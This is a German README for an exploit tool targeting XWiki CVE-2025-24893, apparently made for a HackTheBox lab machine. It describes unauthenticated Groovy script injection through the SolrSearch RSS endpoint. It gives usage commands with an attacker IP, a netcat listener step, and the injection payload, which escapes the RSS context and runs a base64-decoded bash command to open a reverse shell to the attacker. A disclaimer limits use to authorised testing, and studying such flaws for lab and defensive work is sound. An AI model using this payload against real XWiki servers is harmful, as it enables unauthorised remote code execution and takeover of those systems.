
Unauthentifizierter RCE-Exploit für XWiki CVE-2025-24893 per Groovy-Skript-Injektion
Exploit für nicht authentifizierte Remote-Code-Ausführung für XWiki-Versionen, die für CVE-2025-24893 anfällig sind.
XWiki-Versionen vor 15.10.9 sind anfällig für nicht authentifizierte RCE durch Groovy-Skriptinjektion im SolrSearch-RSS-Feed-Handler. Die Schwachstelle besteht, weil XWiki Benutzereingaben im Parameter text nicht ordnungsgemäß bereinigt, wodurch Angreifer den RSS-Kontext verlassen und beliebigen Groovy-Code injizieren können.
CVE-ID: CVE-2025-24893
CVSS-Score: 9.8 (Kritisch)
Betroffene Versionen: XWiki < 15.10.9
requests-Bibliothek)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
Beispiel:
# Listener auf dem Angreifer-Rechner starten
nc -lvnp 9001
# Exploit ausführen
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>Der Exploit zielt auf den folgenden Endpunkt:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
Die Schwachstelle ermöglicht das Verlassen des RSS-Feed-Kontexts:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Der Autor ist nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Programm verursacht werden. Verwenden Sie diesen Exploit nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben.
MIT-Lizenz – Einzelheiten finden Sie in der Datei LICENSE
Erstellt für die HTB-Box „Editor“
Hinweis: Vergewissern Sie sich immer, dass Sie ordnungsgemäß autorisiert sind, bevor Sie Systeme testen.